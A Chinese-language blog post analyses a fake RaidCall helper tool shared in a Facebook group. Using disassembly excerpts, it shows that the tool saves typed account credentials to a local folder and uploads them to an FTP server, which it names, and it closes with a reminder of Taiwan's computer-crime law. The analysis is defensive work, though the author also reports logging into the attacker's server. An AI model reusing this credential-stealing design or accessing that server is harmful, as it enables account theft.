about 5 years ago

最近在FB社團「RC各種輔助」有人貼了一個外掛程式
令我好奇的不是他的功能,而是他的影片示範
一開始就要在外掛先進行「登入RC帳號」的動作
不禁懷疑,背後是否偷偷在搞什麼

貼文內容
在某論壇看到的 還蠻好用的~
下載:http://goo.gl/71Mx4X
* v1.1
1.優化快速創頻/刪頻
2.添加RC登入
3.新增系統優化 & 去廣告
* v1.0
1.程式誕生
Ps. 智能機制:帳密錯誤5次會自動關閉,並於幾分鐘後才可重新使用。
影片:http://youtu.be/WQsAB2g-OVU

該影片描述

發佈日期:2014年7月21日
這是RaidCall Aid的示範影片。
功能有:快創/刪/叮咚。

Ps. 智能機制:帳密錯誤5次會自動關閉,並於幾分鐘後才可重新使用。

下載:http://goo.gl/5vksIz

抓下來立馬開始分析,不意外,是VB6寫的
frmMain在載入時會檢查"C:\Windows\Accounts"是否存在,不存在會建立一個
然後會讓WebBrowserc預先載入RC語音論壇登入頁面
以備讓使用者「登入」

.text:004081DC                 mov     [ebp+var_40], offset aCWindowsAccoun ; "C:\\Windows\\Accounts"
.text:004081E3                 mov     [ebp+var_48], 8
.text:004081EA                 lea     edx, [ebp+var_48]
.text:004081ED                 lea     ecx, [ebp+var_38]
.text:004081F0                 call    ds:__vbaVarDup
.text:004081F6                 push    10h
.text:004081F8                 lea     eax, [ebp+var_38]
.text:004081FB                 push    eax
.text:004081FC                 call    ds:rtcDir
.text:00408202                 mov     edx, eax
.text:00408204                 lea     ecx, [ebp+var_24]
.text:00408207                 call    ds:__vbaStrMove
.text:0040820D                 push    eax
.text:0040820E                 push    offset dword_4055F0
.text:00408213                 call    ds:__vbaStrCmp
.text:00408219                 neg     eax
.text:0040821B                 sbb     eax, eax
.text:0040821D                 inc     eax
.text:0040821E                 neg     eax
.text:00408220                 mov     word ptr [ebp+var_5C], ax
.text:00408224                 lea     ecx, [ebp+var_24]
.text:00408227                 call    ds:__vbaFreeStr
.text:0040822D                 lea     ecx, [ebp+var_38]
.text:00408230                 call    ds:__vbaFreeVar
.text:00408236                 movsx   ecx, word ptr [ebp+var_5C]
.text:0040823A                 test    ecx, ecx
.text:0040823C                 jz      short loc_408250
.text:0040823E                 mov     [ebp+var_4], 6
.text:00408245                 push    offset aCWindowsAccoun ; "C:\\Windows\\Accounts"
.text:0040824A                 call    ds:rtcMakeDir

然後使用者輸入完帳密按「登入」後,填到WebBrowser的表單上送出
帳密會紀錄到"C:\Windows\Accounts"下
檢查登入後的網址是否為成功登入的狀態
錯誤則會將錯誤計數加一,並由一個Timer檢查錯誤次數
登入成功會馬上將帳密上傳到FTP!

.text:00408C58                 test    ecx, ecx
.text:00408C5A                 jz      loc_40937F
.text:00408C60                 mov     [ebp+var_4], 0Dh
.text:00408C67                 mov     [ebp+var_90], offset aFtpFtp_clouds_ ; "ftp://ftp.clouds.tw/"
.text:00408C71                 mov     [ebp+var_98], 8
.text:00408C7B                 mov     eax, 10h

透過程式內的帳號密碼登入這個FTP,發現已有受害者
截至本文發表前有10人RC語音帳密被不肖份子盜取

以上就是這次分析與追蹤的結果

在這裡提醒大家

刑法 第 三十六 章 妨害電腦使用罪
第 358 條 無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞,而入侵他人之電腦或其相關設備者,處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。
第 359 條 無故取得、刪除或變更他人電腦或其相關設備之電磁紀錄,致生損害於公眾或他人者,處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金。
第 360 條 無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備,致生損害於公眾或他人者,處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。
第 362 條 製作專供犯本章之罪之電腦程式,而供自己或他人犯本章之罪,致生損害於公眾或他人者,處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金。

請勿以身試法

← C++Builder 教學:下載與安裝 逆向工程 不明程式把你電腦關機 →
 
comments powered by Disqus